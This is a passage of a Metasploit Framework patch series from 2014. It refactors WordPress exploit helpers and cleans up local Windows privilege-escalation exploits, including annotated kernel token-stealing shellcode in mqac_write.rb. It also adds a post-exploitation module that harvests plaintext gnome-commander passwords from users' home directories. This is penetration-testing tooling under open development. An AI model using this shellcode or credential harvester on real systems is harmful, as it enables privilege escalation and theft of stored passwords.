+    elsif sysinfo["Architecture"] =~ /x64/
       print_error("Running against 64-bit systems is not supported")
       return
     end

From a6479a77d65380fec3405bdb52becd339ca33962 Mon Sep 17 00:00:00 2001
From: Christian Mehlmauer <FireFart@gmail.com>
Date: Tue, 22 Jul 2014 19:49:58 +0200
Subject: [PATCH 148/321] Implented feedback from @jhart-r7

---
 lib/msf/http/wordpress.rb                      |  1 -
 lib/msf/http/wordpress/base.rb                 | 18 ++++++++----------
 lib/msf/http/wordpress/helpers.rb              |  8 ++++----
 lib/msf/http/wordpress/login.rb                |  3 +--
 lib/msf/http/wordpress/posts.rb                |  2 +-
 lib/msf/http/wordpress/users.rb                |  2 +-
 lib/msf/http/wordpress/version.rb              |  4 +---
 .../unix/webapp/wp_wptouch_file_upload.rb      |  6 ++----
 .../webapp/wp_wysija_newsletters_upload.rb     |  2 --
 9 files changed, 18 insertions(+), 28 deletions(-)

diff --git a/lib/msf/http/wordpress.rb b/lib/msf/http/wordpress.rb
index 336b55c449..53148c2483 100644
--- a/lib/msf/http/wordpress.rb
+++ b/lib/msf/http/wordpress.rb
@@ -1,4 +1,3 @@
-# encoding: UTF-8
 # -*- coding: binary -*-
 
 # This module provides a way of interacting with wordpress installations
diff --git a/lib/msf/http/wordpress/base.rb b/lib/msf/http/wordpress/base.rb
index dd3d49fd72..30296cade8 100644
--- a/lib/msf/http/wordpress/base.rb
+++ b/lib/msf/http/wordpress/base.rb
@@ -1,4 +1,3 @@
-# encoding: UTF-8
 # -*- coding: binary -*-
 
 module Msf::HTTP::Wordpress::Base
@@ -10,16 +9,15 @@ module Msf::HTTP::Wordpress::Base
         'method' => 'GET',
         'uri' => normalize_uri(target_uri.path)
     )
-    return res if res &&
-        res.code == 200 &&
-        (
-          res.body =~ /["'][^"']*\/#{Regexp.escape(wp_content_dir)}\/[^"']*["']/i ||
-          res.body =~ /<link rel=["']wlwmanifest["'].*href=["'].*\/wp-includes\/wlwmanifest\.xml["'] \/>/i ||
-          res.body =~ /<link rel=["']pingback["'].*href=["'].*\/xmlrpc\.php["'](?: \/)*>/i
-        )
+    wordpress_detect_regexes = [
+      /["'][^"']*\/#{Regexp.escape(wp_content_dir)}\/[^"']*["']/i,
+      /<link rel=["']wlwmanifest["'].*href=["'].*\/wp-includes\/wlwmanifest\.xml["'] \/>/i,
+      /<link rel=["']pingback["'].*href=["'].*\/xmlrpc\.php["'](?: \/)*>/i
+    ]
+    return res if res && res.code == 200 && res.body && wordpress_detect_regexes.any? { |r| res.body =~ r }
     return nil
-  rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
-    print_error("#{peer} - Error connecting to #{target_uri}")
+  rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e
+    print_error("#{peer} - Error connecting to #{target_uri}: #{e}")
     return nil
   end
 end
diff --git a/lib/msf/http/wordpress/helpers.rb b/lib/msf/http/wordpress/helpers.rb
index 355dce5c85..d6f679716d 100644
--- a/lib/msf/http/wordpress/helpers.rb
+++ b/lib/msf/http/wordpress/helpers.rb
@@ -49,7 +49,7 @@ module Msf::HTTP::Wordpress::Helpers
     options.merge!({'vars_post' => vars_post})
     options.merge!({'cookie' => login_cookie}) if login_cookie
     res = send_request_cgi(options)
-    if res and (res.code == 301 or res.code == 302) and res.headers['Location']
+    if res and res.redirect? and res.redirection
       return wordpress_helper_parse_location_header(res)
     else
       message = "#{peer} - Post comment failed."
@@ -101,7 +101,7 @@ module Msf::HTTP::Wordpress::Helpers
       else
         return res.body
       end
-    elsif res and (res.code == 301 or res.code == 302) and res.headers['Location']
+    elsif res && res.redirect? && res.redirection
       path = wordpress_helper_parse_location_header(res)
       return wordpress_helper_check_post_id(path, comments_enabled, login_cookie)
     end
@@ -113,9 +113,9 @@ module Msf::HTTP::Wordpress::Helpers
   # @param res [Rex::Proto::Http::Response] The HTTP response
   # @return [String,nil] the path and query, nil on error
   def wordpress_helper_parse_location_header(res)
-    return nil unless res and (res.code == 301 or res.code == 302) and res.headers['Location']
+    return nil unless res && res.redirect? && res.redirection
 
-    location = res.headers['Location']
+    location = res.redirection
     path_from_uri(location)
   end
 
diff --git a/lib/msf/http/wordpress/login.rb b/lib/msf/http/wordpress/login.rb
index e4133fdf87..007e6acc0f 100644
--- a/lib/msf/http/wordpress/login.rb
+++ b/lib/msf/http/wordpress/login.rb
@@ -1,4 +1,3 @@
-# encoding: UTF-8
 # -*- coding: binary -*-
 
 module Msf::HTTP::Wordpress::Login
@@ -15,7 +14,7 @@ module Msf::HTTP::Wordpress::Login
         'vars_post' => wordpress_helper_login_post_data(user, pass, redirect)
     )
 
-    if res && (res.code == 301 || res.code == 302) && res.headers['Location'] == redirect
+    if res && res.redirect? && res.redirection == redirect
       cookies = res.get_cookies
       # Check if a valid wordpress cookie is returned
       return cookies if
diff --git a/lib/msf/http/wordpress/posts.rb b/lib/msf/http/wordpress/posts.rb
index 171ff6ce18..d343e8accf 100644
--- a/lib/msf/http/wordpress/posts.rb
+++ b/lib/msf/http/wordpress/posts.rb
@@ -112,7 +112,7 @@ module Msf::HTTP::Wordpress::Posts
       count = max_redirects
 
       # Follow redirects
-      while (res.code == 301 || res.code == 302) and res.headers['Location'] and count != 0
+      while res.redirect? && res.redirection && count != 0
         path = wordpress_helper_parse_location_header(res)
         return nil unless path
 
diff --git a/lib/msf/http/wordpress/users.rb b/lib/msf/http/wordpress/users.rb
index d696d9f9f8..150b48491b 100644
--- a/lib/msf/http/wordpress/users.rb
+++ b/lib/msf/http/wordpress/users.rb
@@ -33,7 +33,7 @@ module Msf::HTTP::Wordpress::Users
         'uri' => url
     })
 
-    if res and res.code == 301
+    if res and res.redirect?
       uri = wordpress_helper_parse_location_header(res)
       return nil unless uri
       # try to extract username from location
diff --git a/lib/msf/http/wordpress/version.rb b/lib/msf/http/wordpress/version.rb
index 193800f9dd..cae4aecb56 100644
--- a/lib/msf/http/wordpress/version.rb
+++ b/lib/msf/http/wordpress/version.rb
@@ -1,4 +1,3 @@
-# encoding: UTF-8
 # -*- coding: binary -*-
 
 module Msf::HTTP::Wordpress::Version
@@ -88,7 +87,7 @@ module Msf::HTTP::Wordpress::Version
     when :theme
       folder = 'themes'
     else
-      fail("Unknown type #{type}")
+      fail("Unknown readme type #{type}")
     end
 
     readme_url = normalize_uri(target_uri.path, wp_content_dir, folder, name, 'readme.txt')
@@ -121,7 +120,6 @@ module Msf::HTTP::Wordpress::Version
         # Not in range, nut vulnerable
         return Msf::Exploit::CheckCode::Safe
       end
-      return
     # version newer than fixed version
     else
       return Msf::Exploit::CheckCode::Safe
diff --git a/modules/exploits/unix/webapp/wp_wptouch_file_upload.rb b/modules/exploits/unix/webapp/wp_wptouch_file_upload.rb
index bcd5c06c8c..2b14693583 100644
--- a/modules/exploits/unix/webapp/wp_wptouch_file_upload.rb
+++ b/modules/exploits/unix/webapp/wp_wptouch_file_upload.rb
@@ -1,5 +1,3 @@
-# encoding: UTF-8
-
 ##
 # This module requires Metasploit: http//metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
@@ -72,8 +70,8 @@ class Metasploit3 < Msf::Exploit::Remote
     )
 
     # forward to profile.php or other page?
-    if res && res.code.to_s =~ /30[0-9]/ && res.headers['Location']
-      location = res.headers['Location']
+    if res && res.redirect? && res.redirection
+      location = res.redirection
       print_status("#{peer} - Following redirect to #{location}")
       res = send_request_cgi(
         'uri'    => location,
diff --git a/modules/exploits/unix/webapp/wp_wysija_newsletters_upload.rb b/modules/exploits/unix/webapp/wp_wysija_newsletters_upload.rb
index 9f4742fd5a..18ce105b57 100644
--- a/modules/exploits/unix/webapp/wp_wysija_newsletters_upload.rb
+++ b/modules/exploits/unix/webapp/wp_wysija_newsletters_upload.rb
@@ -1,5 +1,3 @@
-# encoding: UTF-8
-
 ##
 # This module requires Metasploit: http//metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework

From 073a8c52336e262590af73d1ed6641ca10146094 Mon Sep 17 00:00:00 2001
From: Christian Mehlmauer <FireFart@gmail.com>
Date: Tue, 22 Jul 2014 19:55:26 +0200
Subject: [PATCH 149/321] redirection returns an URI

---
 lib/msf/http/wordpress/login.rb | 3 +--
 1 file changed, 1 insertion(+), 2 deletions(-)

diff --git a/lib/msf/http/wordpress/login.rb b/lib/msf/http/wordpress/login.rb
index 007e6acc0f..8128e10d23 100644
--- a/lib/msf/http/wordpress/login.rb
+++ b/lib/msf/http/wordpress/login.rb
@@ -13,8 +13,7 @@ module Msf::HTTP::Wordpress::Login
         'uri' => wordpress_url_login,
         'vars_post' => wordpress_helper_login_post_data(user, pass, redirect)
     )
-
-    if res && res.redirect? && res.redirection == redirect
+    if res && res.redirect? && res.redirection && res.redirection.to_s == redirect
       cookies = res.get_cookies
       # Check if a valid wordpress cookie is returned
       return cookies if

From 7f79e58e7fcaa07459ec491cc7dc701768550c6f Mon Sep 17 00:00:00 2001
From: Spencer McIntyre <zeroSteiner@gmail.com>
Date: Tue, 22 Jul 2014 14:45:00 -0400
Subject: [PATCH 150/321] Lots and cleanups based on PR feed back

---
 modules/exploits/windows/local/mqac_write.rb | 51 ++++++++++----------
 1 file changed, 26 insertions(+), 25 deletions(-)

diff --git a/modules/exploits/windows/local/mqac_write.rb b/modules/exploits/windows/local/mqac_write.rb
index 6a7fefdf3c..e878c18323 100644
--- a/modules/exploits/windows/local/mqac_write.rb
+++ b/modules/exploits/windows/local/mqac_write.rb
@@ -83,12 +83,13 @@ class Metasploit3 < Msf::Exploit::Local
     local_sys = resolve_sid("S-1-5-18")
     system_account_name = "#{local_sys[:domain]}\\#{local_sys[:name]}"
 
+    this_pid = session.sys.process.getpid
     # Processes that can Blue Screen a host if migrated in to
     dangerous_processes = ["lsass.exe", "csrss.exe", "smss.exe"]
     session.sys.process.processes.each do |p|
       # Check we are not migrating to a process that can BSOD the host
       next if dangerous_processes.include?(p["name"])
-      next if p["pid"] == session.sys.process.getpid
+      next if p["pid"] == this_pid
       next if p["pid"] == 4
       next if p["user"] != system_account_name
       return p
@@ -136,7 +137,6 @@ class Metasploit3 < Msf::Exploit::Local
       return
     end
 
-    this_proc = session.sys.process.open
     kernel_info = find_sys_base(nil)
     base_addr = 0xffff
     print_status("Kernel Base Address: 0x#{kernel_info[0].to_s(16)}")
@@ -144,11 +144,13 @@ class Metasploit3 < Msf::Exploit::Local
     handle = open_device
     return if handle.nil?
 
-    if not this_proc.memory.writable?(base_addr)
-      result = session.railgun.ntdll.NtAllocateVirtualMemory(-1, [ 1 ].pack("L"), nil, [ 0xffff ].pack("L"), "MEM_COMMIT|MEM_RESERVE", "PAGE_EXECUTE_READWRITE")
+    this_proc = session.sys.process.open
+    unless this_proc.memory.writable?(base_addr)
+      session.railgun.ntdll.NtAllocateVirtualMemory(-1, [ 1 ].pack("L"), nil, [ 0xffff ].pack("L"), "MEM_COMMIT|MEM_RESERVE", "PAGE_EXECUTE_READWRITE")
     end
-    if not this_proc.memory.writable?(base_addr)
+    unless this_proc.memory.writable?(base_addr)
       print_error('Failed to properly allocate memory')
+      this_proc.close
       return
     end
 
@@ -160,34 +162,33 @@ class Metasploit3 < Msf::Exploit::Local
     halDispatchTable += kernel_info[0]
     print_status("HalDisPatchTable Address: 0x#{halDispatchTable.to_s(16)}")
 
-    tokenstealing  = "\x31\xc0"
-    tokenstealing << "\x52"
-    tokenstealing << "\x53"
-    tokenstealing << "\x33\xc0"
-    tokenstealing << "\x64\x8b\x80\x24\x01\x00\x00"
-    tokenstealing << "\x8b\x40" + target['_KPROCESS']
-    tokenstealing << "\x8b\xc8"
-    tokenstealing << "\x8b\x98" + target['_TOKEN'] + "\x00\x00\x00"
-    tokenstealing << "\x89\x1d\x00\x09\x02\x00"
-    tokenstealing << "\x8b\x80" + target['_APLINKS'] + "\x00\x00\x00"
-    tokenstealing << "\x81\xe8" + target['_APLINKS'] + "\x00\x00\x00"
-    tokenstealing << "\x81\xb8" + target['_UPID'] + "\x00\x00\x00\x04\x00\x00\x00"
-    tokenstealing << "\x75\xe8"
-    tokenstealing << "\x8b\x90" + target['_TOKEN'] + "\x00\x00\x00"
-    tokenstealing << "\x8b\xc1"
-    tokenstealing << "\x89\x90" + target['_TOKEN'] + "\x00\x00\x00"
-    tokenstealing << "\x5b"
-    tokenstealing << "\x5a"
-    tokenstealing << "\xc2\x10"
+    tokenstealing  = "\x52"                                                        # push edx                         # Save edx on the stack
+    tokenstealing << "\x53"                                                        # push ebx                         # Save ebx on the stack
+    tokenstealing << "\x33\xc0"                                                    # xor eax, eax                     # eax = 0
+    tokenstealing << "\x64\x8b\x80\x24\x01\x00\x00"                                # mov eax, dword ptr fs:[eax+124h] # Retrieve ETHREAD
+    tokenstealing << "\x8b\x40" + target['_KPROCESS']                              # mov eax, dword ptr [eax+44h]     # Retrieve _KPROCESS
+    tokenstealing << "\x8b\xc8"                                                    # mov ecx, eax
+    tokenstealing << "\x8b\x98" + target['_TOKEN'] + "\x00\x00\x00"                # mov ebx, dword ptr [eax+0C8h]    # Retrieves TOKEN
+    tokenstealing << "\x8b\x80" + target['_APLINKS'] + "\x00\x00\x00"              # mov eax, dword ptr [eax+88h]  <====| # Retrieve FLINK from ActiveProcessLinks
+    tokenstealing << "\x81\xe8" + target['_APLINKS'] + "\x00\x00\x00"              # sub eax,88h                        | # Retrieve _EPROCESS Pointer from the ActiveProcessLinks
+    tokenstealing << "\x81\xb8" + target['_UPID'] + "\x00\x00\x00\x04\x00\x00\x00" # cmp dword ptr [eax+84h], 4         | # Compares UniqueProcessId with 4 (The System Process on Windows XP)
+    tokenstealing << "\x75\xe8"                                                    # jne 0000101e ======================
+    tokenstealing << "\x8b\x90" + target['_TOKEN'] + "\x00\x00\x00"                # mov edx,dword ptr [eax+0C8h]     # Retrieves TOKEN and stores on EDX
+    tokenstealing << "\x8b\xc1"                                                    # mov eax, ecx                     # Retrieves KPROCESS stored on ECX
+    tokenstealing << "\x89\x90" + target['_TOKEN'] + "\x00\x00\x00"                # mov dword ptr [eax+0C8h],edx     # Overwrites the TOKEN for the current KPROCESS
+    tokenstealing << "\x5b"                                                        # pop ebx                          # Restores ebx
+    tokenstealing << "\x5a"                                                        # pop edx                          # Restores edx
+    tokenstealing << "\xc2\x10"                                                    # ret 10h                          # Away from the kernel!
 
     shellcode = make_nops(0x200) + tokenstealing
     this_proc.memory.write(0x1, shellcode)
+    this_proc.close
 
     print_status("Triggering vulnerable IOCTL")
     session.railgun.ntdll.NtDeviceIoControlFile(handle, 0, 0, 0, 4, 0x1965020f, 1, 0x258, halDispatchTable + 0x4, 0)
     result = session.railgun.ntdll.NtQueryIntervalProfile(1337, 4)
 
-    if not is_system?
+    unless is_system?
       print_error("Exploit failed")
       return
     end

From 125b2df8f5098355806a5ec90702354c837ce4de Mon Sep 17 00:00:00 2001
From: Jay Smith <jsmith@korelogic.com>
Date: Tue, 22 Jul 2014 14:53:24 -0400
Subject: [PATCH 151/321] Update code to reflect @hdmoore code suggestions

---
 modules/exploits/windows/local/vbox_guest.rb | 4 +++-
 1 file changed, 3 insertions(+), 1 deletion(-)

diff --git a/modules/exploits/windows/local/vbox_guest.rb b/modules/exploits/windows/local/vbox_guest.rb
index 6e78fbea6d..dbfa884ec2 100644
--- a/modules/exploits/windows/local/vbox_guest.rb
+++ b/modules/exploits/windows/local/vbox_guest.rb
@@ -188,7 +188,6 @@ class Metasploit3 < Msf::Exploit::Local
   end
 
   def check
-    vprint_status("Adding the railgun stuff...")
     add_railgun_functions
 
     if sysinfo["Architecture"] =~ /wow64/i or sysinfo["Architecture"] =~ /x64/
@@ -207,6 +206,9 @@ class Metasploit3 < Msf::Exploit::Local
     end
 
     file_path = expand_path("%windir%") << "\\system32\\drivers\\vboxguest.sys"
+    if !file?(file_path)
+      fail_with(Failure::Unknown, "VBoxGuest.sys file does not exist in the default location") 
+    end
     major, minor, build, revision, branch = file_version(file_path)
     vprint_status("vboxguest.sys file version: #{major}.#{minor}.#{build}.#{revision} branch: #{branch}")
 

From 0db3a0ec974dca0274fe2f9e2bd4b69e53a27fe1 Mon Sep 17 00:00:00 2001
From: Jay Smith <jsmith@korelogic.com>
Date: Tue, 22 Jul 2014 15:14:24 -0400
Subject: [PATCH 152/321] Update code to reflect @jlee-r7's code review

---
 modules/exploits/windows/local/vbox_guest.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/exploits/windows/local/vbox_guest.rb b/modules/exploits/windows/local/vbox_guest.rb
index dbfa884ec2..d34b8a8ada 100644
--- a/modules/exploits/windows/local/vbox_guest.rb
+++ b/modules/exploits/windows/local/vbox_guest.rb
@@ -100,7 +100,7 @@ class Metasploit3 < Msf::Exploit::Local
         if current_drvname.downcase.include?('krnl')
           return [address, current_drvname]
         end
-      elsif drvname == results['lpBaseName'][0, results['return']]
+      elsif drvname == current_drvname
         return [address, current_drvname]
       end
     end

From c1a0f707ef2bede4ab8a44ba0750bd454ac36a8c Mon Sep 17 00:00:00 2001
From: Christian Mehlmauer <FireFart@gmail.com>
Date: Tue, 22 Jul 2014 22:29:01 +0200
Subject: [PATCH 153/321] typos

---
 lib/msf/http/wordpress/version.rb | 8 ++++----
 1 file changed, 4 insertions(+), 4 deletions(-)

diff --git a/lib/msf/http/wordpress/version.rb b/lib/msf/http/wordpress/version.rb
index cae4aecb56..d2fd251f0e 100644
--- a/lib/msf/http/wordpress/version.rb
+++ b/lib/msf/http/wordpress/version.rb
@@ -40,7 +40,7 @@ module Msf::HTTP::Wordpress::Version
   #
   # @param [String] plugin_name The name of the plugin
   # @param [String] fixed_version The version the vulnerability was fixed in
-  # @param [String] vuln_introduced_version Optional. The version the vulnerability was introduced.
+  # @param [String] vuln_introduced_version Optional, the version the vulnerability was introduced
   #
   # @return [ Msf::Exploit::CheckCode ]
   def check_plugin_version_from_readme(plugin_name, fixed_version, vuln_introduced_version = nil)
@@ -49,9 +49,9 @@ module Msf::HTTP::Wordpress::Version
 
   # Checks a readme for a vulnerable version
   #
-  # @param [String] theme_name The name of the plugin
+  # @param [String] theme_name The name of the theme
   # @param [String] fixed_version The version the vulnerability was fixed in
-  # @param [String] vuln_introduced_version Optional. The version the vulnerability was introduced.
+  # @param [String] vuln_introduced_version Optional, the version the vulnerability was introduced
   #
   # @return [ Msf::Exploit::CheckCode ]
   def check_theme_version_from_readme(theme_name, fixed_version, vuln_introduced_version = nil)
@@ -60,7 +60,7 @@ module Msf::HTTP::Wordpress::Version
 
   private
 
-  # Used to check if the version is correct: must contain at least one dot.
+  # Used to check if the version is correct: must contain at least one dot
   #
   # @return [ String ]
   def wordpress_version_pattern

From 57839e0f4bdda7d70755450269b47c2a233b676e Mon Sep 17 00:00:00 2001
From: Christian Mehlmauer <FireFart@gmail.com>
Date: Tue, 22 Jul 2014 23:26:50 +0200
Subject: [PATCH 154/321] Fix some yardoc issues

---
 lib/msf/core/exploit/cmdstager.rb           | 4 ++--
 lib/msf/core/modules/loader/directory.rb    | 2 +-
 lib/msf/ui/console/command_dispatcher/db.rb | 2 +-
 3 files changed, 4 insertions(+), 4 deletions(-)

diff --git a/lib/msf/core/exploit/cmdstager.rb b/lib/msf/core/exploit/cmdstager.rb
index 7dcc3c43bb..9e738da248 100644
--- a/lib/msf/core/exploit/cmdstager.rb
+++ b/lib/msf/core/exploit/cmdstager.rb
@@ -154,7 +154,7 @@ module Exploit::CmdStager
 
   # Returns a hash with the :decoder option if possible
   #
-  # @params opts [Hash] Input Hash.
+  # @param opts [Hash] Input Hash.
   # @return [Hash] Hash with the input data and a :decoder option when
   #   possible.
   def opts_with_decoder(opts = {})
@@ -279,7 +279,7 @@ module Exploit::CmdStager
   # Answers if the input flavor is compatible with the current target or module.
   #
   # @param f [Symbol] The flavor to check
-  # @returns  [Boolean] true if compatible, false otherwise.
+  # @return [Boolean] true if compatible, false otherwise.
   def compatible_flavor?(f)
     return true if target_flavor.nil?
     case target_flavor.class.to_s
diff --git a/lib/msf/core/modules/loader/directory.rb b/lib/msf/core/modules/loader/directory.rb
index a5712125ce..0b61a1b02d 100644
--- a/lib/msf/core/modules/loader/directory.rb
+++ b/lib/msf/core/modules/loader/directory.rb
@@ -18,7 +18,7 @@ class Msf::Modules::Loader::Directory < Msf::Modules::Loader::Base
   # Yields the module_reference_name for each module file found under the directory path.
   #
   # @param [String] path The path to the directory.
-  # @param [Array] modules An array of regex patterns to search for specific modules
+  # @param [Hash] opts Input Hash.
   # @yield (see Msf::Modules::Loader::Base#each_module_reference_name)
   # @yieldparam [String] path The path to the directory.
   # @yieldparam [String] type The type correlated with the directory under path.
diff --git a/lib/msf/ui/console/command_dispatcher/db.rb b/lib/msf/ui/console/command_dispatcher/db.rb
index e16c68ac1a..c10fa5b899 100644
--- a/lib/msf/ui/console/command_dispatcher/db.rb
+++ b/lib/msf/ui/console/command_dispatcher/db.rb
@@ -1802,7 +1802,7 @@ class Db
   # Miscellaneous option helpers
   #
 
-  # Parse +arg+ into a {RangeWalker} and append the result into +host_ranges+
+  # Parse +arg+ into a {Rex::Socket::RangeWalker} and append the result into +host_ranges+
   #
   # @note This modifies +host_ranges+ in place
   #

From 30c00f4fd6141978ba14ac7b1a0514c3d7219b6a Mon Sep 17 00:00:00 2001
From: David Bloom <softage.informatique@gmail.com>
Date: Wed, 23 Jul 2014 20:20:29 +0200
Subject: [PATCH 155/321] gnome-commander credentials add

---
 .../linux/gather/gnome_commander_creds.rb     | 59 +++++++++++++++++++
 1 file changed, 59 insertions(+)
 create mode 100644 modules/post/linux/gather/gnome_commander_creds.rb

diff --git a/modules/post/linux/gather/gnome_commander_creds.rb b/modules/post/linux/gather/gnome_commander_creds.rb
new file mode 100644
index 0000000000..5126352be5
--- /dev/null
+++ b/modules/post/linux/gather/gnome_commander_creds.rb
@@ -0,0 +1,59 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'msf/core/auxiliary/report'
+
+class Metasploit3 < Msf::Post
+
+  include Msf::Post::File
+  include Msf::Post::Unix
+  include Msf::Auxiliary::Report
+
+  def initialize(info={})
+    super( update_info( info,
+        'Name'          => 'Linux Gather Gnome-Commander Creds',
+        'Description'   => %q{
+          Gnome-commander stores clear text passwords in ~/.gnome-commander/connections file.
+        },
+        'License'       => MSF_LICENSE,
+        'Author'        => [ 'David Bloom' ], # Twitter: @philophobia78
+        'Platform'      => %w{ linux },
+        'SessionTypes'  => [ 'meterpreter', 'shell']
+      ))
+  end
+
+  def run
+    user_dirs = []
+    user = cmd_exec("whoami").chomp
+    if (user =~ /root/)
+       print_status("Current user is #{user}, probing all home dirs")
+       user_dirs << '/root'
+       cmd_exec('ls /home').each_line.map { |l| user_dirs << "/home/#{l}".chomp }
+    else
+       print_status("Current user is #{user}, probing /home/#{user}")
+       user_dirs << '/home/#{user}'
+    end
+    # Try to find connections file in users homes
+    user_dirs.each do |dir|
+      connections_file = "#{dir}/.gnome-commander/connections"
+      unless file?(connections_file)
+        # File not found
+        print_status("File not found : #{connections_file}")
+      else
+        begin
+          print_good("File found : #{connections_file}")
+          print_line(read_file(connections_file))
+          p = store_loot("connections", "text/plain", session, read_file(connections_file), "#{connections_file}", "Gnome-Commander connections")
+          print_good ("Connections file saved to #{p.to_s}")
+          print_line()
+        rescue EOFError
+          # If there's nothing in the file, we hit EOFError
+          print_error("Nothing read from file: #{dbvis_file}, file may be empty")
+        end
+      end
+    end
+  end
+end

From 41e5e24b190fb071f6eea8c86a56459a122d3170 Mon Sep 17 00:00:00 2001
From: David Bloom <softage.informatique@gmail.com>
Date: Wed, 23 Jul 2014 20:26:43 +0200
Subject: [PATCH 156/321] Update gnome_commander_creds.rb

---
 modules/post/linux/gather/gnome_commander_creds.rb | 2 --
 1 file changed, 2 deletions(-)

diff --git a/modules/post/linux/gather/gnome_commander_creds.rb b/modules/post/linux/gather/gnome_commander_creds.rb
index 5126352be5..336f6ae908 100644
--- a/modules/post/linux/gather/gnome_commander_creds.rb
+++ b/modules/post/linux/gather/gnome_commander_creds.rb
@@ -9,8 +9,6 @@ require 'msf/core/auxiliary/report'
 class Metasploit3 < Msf::Post
 
   include Msf::Post::File
-  include Msf::Post::Unix
-  include Msf::Auxiliary::Report
 
   def initialize(info={})
     super( update_info( info,

From 8a6fa178d65c943859b9c626451c3940020c8045 Mon Sep 17 00:00:00 2001
From: David Bloom <softage.informatique@gmail.com>
Date: Thu, 24 Jul 2014 08:10:28 +0200
Subject: [PATCH 157/321] Update gnome_commander_creds.rb

---
 modules/post/linux/gather/gnome_commander_creds.rb | 3 ---
 1 file changed, 3 deletions(-)

diff --git a/modules/post/linux/gather/gnome_commander_creds.rb b/modules/post/linux/gather/gnome_commander_creds.rb
index 336f6ae908..5d4d536e0c 100644
--- a/modules/post/linux/gather/gnome_commander_creds.rb
+++ b/modules/post/linux/gather/gnome_commander_creds.rb
@@ -3,9 +3,6 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
-require 'msf/core'
-require 'msf/core/auxiliary/report'
-
 class Metasploit3 < Msf::Post
 
   include Msf::Post::File

From bd1970ced93c22c2acfaf3b23c70f1576be29c6a Mon Sep 17 00:00:00 2001
From: Jon Hart <jon_hart@rapid7.com>
Date: Thu, 24 Jul 2014 11:05:06 -0700
Subject: [PATCH 158/321] Fix basic HTTP directory traversal detection

---
 modules/auxiliary/scanner/http/http_traversal.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/auxiliary/scanner/http/http_traversal.rb b/modules/auxiliary/scanner/http/http_traversal.rb
index d7fe81ab4b..a24ba1412e 100644
--- a/modules/auxiliary/scanner/http/http_traversal.rb
+++ b/modules/auxiliary/scanner/http/http_traversal.rb
@@ -59,7 +59,7 @@ class Metasploit3 < Msf::Auxiliary
         OptString.new('PATH',    [true, 'Vulnerable path. Ex: /foo/index.php?pg=', '/']),
         OptString.new('DATA',    [false,'HTTP body data', '']),
         OptInt.new('DEPTH',      [true, 'Traversal depth', 5]),
-        OptRegexp.new('PATTERN', [true, 'Regexp pattern to determine directory traversal', '^HTTP/1.1 200 OK']),
+        OptRegexp.new('PATTERN', [true, 'Regexp pattern to determine directory traversal', '^HTTP/\\d\\.\\d 200']),
         OptPath.new(
           'FILELIST',
           [

From 718c401472e0648198ffc47804c028b4d9f2c29c Mon Sep 17 00:00:00 2001
From: David Bloom <softage.informatique@gmail.com>
Date: Thu, 24 Jul 2014 23:01:30 +0200
Subject: [PATCH 159/321] Update gnome_commander_creds.rb

---
 modules/post/linux/gather/gnome_commander_creds.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/post/linux/gather/gnome_commander_creds.rb b/modules/post/linux/gather/gnome_commander_creds.rb
index 5d4d536e0c..64a8b78086 100644
--- a/modules/post/linux/gather/gnome_commander_creds.rb
+++ b/modules/post/linux/gather/gnome_commander_creds.rb
@@ -36,7 +36,7 @@ class Metasploit3 < Msf::Post
       connections_file = "#{dir}/.gnome-commander/connections"
       unless file?(connections_file)
         # File not found
-        print_status("File not found : #{connections_file}")
+        print_error("File not found : #{connections_file}")
       else
         begin
           print_good("File found : #{connections_file}")

From 9aa1b86d8fbcdcddd7706b89a5417ccc64cbdebe Mon Sep 17 00:00:00 2001
From: David Bloom <softage.informatique@gmail.com>
Date: Thu, 24 Jul 2014 23:10:00 +0200
Subject: [PATCH 160/321] Update gnome_commander_creds.rb

---
 modules/post/linux/gather/gnome_commander_creds.rb | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/modules/post/linux/gather/gnome_commander_creds.rb b/modules/post/linux/gather/gnome_commander_creds.rb
index 64a8b78086..4d35fac127 100644
--- a/modules/post/linux/gather/gnome_commander_creds.rb
+++ b/modules/post/linux/gather/gnome_commander_creds.rb
@@ -42,11 +42,11 @@ class Metasploit3 < Msf::Post
           print_good("File found : #{connections_file}")
           print_line(read_file(connections_file))
           p = store_loot("connections", "text/plain", session, read_file(connections_file), "#{connections_file}", "Gnome-Commander connections")
-          print_good ("Connections file saved to #{p.to_s}")
+          print_good ("Connections file saved to #{p}")
           print_line()
         rescue EOFError
           # If there's nothing in the file, we hit EOFError
-          print_error("Nothing read from file: #{dbvis_file}, file may be empty")
+          print_error("Nothing read from file: #{connections_file}, file may be empty")
         end
       end
     end

From 2e5c2a514b7c3b1d25160805fda0ea64d6b3130a Mon Sep 17 00:00:00 2001
From: David Bloom <softage.informatique@gmail.com>
Date: Thu, 24 Jul 2014 23:16:10 +0200
Subject: [PATCH 161/321] Update gnome_commander_creds.rb

---
 modules/post/linux/gather/gnome_commander_creds.rb | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/modules/post/linux/gather/gnome_commander_creds.rb b/modules/post/linux/gather/gnome_commander_creds.rb
index 4d35fac127..1bf5687f6c 100644
--- a/modules/post/linux/gather/gnome_commander_creds.rb
+++ b/modules/post/linux/gather/gnome_commander_creds.rb
@@ -23,7 +23,7 @@ class Metasploit3 < Msf::Post
   def run
     user_dirs = []
     user = cmd_exec("whoami").chomp
-    if (user =~ /root/)
+    if (user == /root/)
        print_status("Current user is #{user}, probing all home dirs")
        user_dirs << '/root'
        cmd_exec('ls /home').each_line.map { |l| user_dirs << "/home/#{l}".chomp }
@@ -41,7 +41,7 @@ class Metasploit3 < Msf::Post
         begin
           print_good("File found : #{connections_file}")
           print_line(read_file(connections_file))
-          p = store_loot("connections", "text/plain", session, read_file(connections_file), "#{connections_file}", "Gnome-Commander connections")
+          p = store_loot("connections", "text/plain", session, read_file(connections_file), "connections_file", "Gnome-Commander connections")
           print_good ("Connections file saved to #{p}")
           print_line()
